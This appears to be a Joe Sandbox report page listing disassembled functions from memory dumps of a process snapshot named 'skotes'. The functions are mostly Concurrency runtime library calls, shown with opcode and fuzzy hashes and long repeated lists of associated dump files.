Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: d62c612334bf54639c1a5e0b80487dd474084918b2608dce3e48469e8ba1b6e6
Instruction ID: c6d9e9a606e3d931f612f9e2ceaf4ee412c99c1a52ee93e02e9dfd276ef5fd37
Opcode Fuzzy Hash: d62c612334bf54639c1a5e0b80487dd474084918b2608dce3e48469e8ba1b6e6
Instruction Fuzzy Hash: 1251A031A40215DBDF24EF50C895BAEB775EF44710F1884A8E9067B3D2CB71AE05DBA1

Function 00BFCB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 00BFCBAA

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 4a28196aa06ef9ceaa9acd6cef37519a6c4b536fa98ed57dd4348a650f7d8a45
Instruction ID: 7c1709a356877fd269559f5e3cb79b46ffbbf9d38517e7c2004dbbca6a460156
Opcode Fuzzy Hash: 4a28196aa06ef9ceaa9acd6cef37519a6c4b536fa98ed57dd4348a650f7d8a45
Instruction Fuzzy Hash: F4B09236B2383847CA516B14BC187AEBB54AA81A1130A0196ED05A72258A111D828BD4

Function 00BFDD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e6ff6df0f16b5e283471986baa9aac0a8985caec0fd1f7035b489ab3f9bc77
Instruction ID: 164edc1c7b814f083aa9327d5808af8eb44697d7db84305acbd2da574142e087
Opcode Fuzzy Hash: 79e6ff6df0f16b5e283471986baa9aac0a8985caec0fd1f7035b489ab3f9bc77
Instruction Fuzzy Hash: 70519BB6E0160ACBDB15CF58D8857BEBBF2FB48304F2485AAD605EB250D374AD44CB90

Function 00BFF028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BFF2BB

Strings

pEvents, xrefs: 00BFF2B3

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 8464a62e9c26c1d99af1202968cbd384bc3958c3c3552805d13b7fffe83e8d07
Instruction ID: 0f0a2cd2c854c0ee3a0890935925782a13a2d34ae3ce7a017a5b4342cba16ba1
Opcode Fuzzy Hash: 8464a62e9c26c1d99af1202968cbd384bc3958c3c3552805d13b7fffe83e8d07
Instruction Fuzzy Hash: DC815A31D0021E9BCF25DFA8C981BBEB7F5EF05310F1440A9E611B7292DB74AA49CB91

Function 00C126D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00C126E3

Part of subcall function 00C124E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C12504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00C12704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00C12711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00C1275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00C127E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00C127F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00C12846

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 28d11c1e848a8504664aa5aaff7135c0b70e50f33c4659fb6972e6e99d6688fc
Instruction ID: 7f8979861173463856a7eafb329df2c960164acb530f7c51c02bdcccf6e9c803
Opcode Fuzzy Hash: 28d11c1e848a8504664aa5aaff7135c0b70e50f33c4659fb6972e6e99d6688fc
Instruction Fuzzy Hash: E7819039900249ABDF169F54C951BFE7BB1AF47304F044098ED512B292C7368EB6FBA1

Function 00C12970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00C12982

Part of subcall function 00C124E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C12504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00C129A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00C129B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00C129FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00C12AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00C12AD8

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
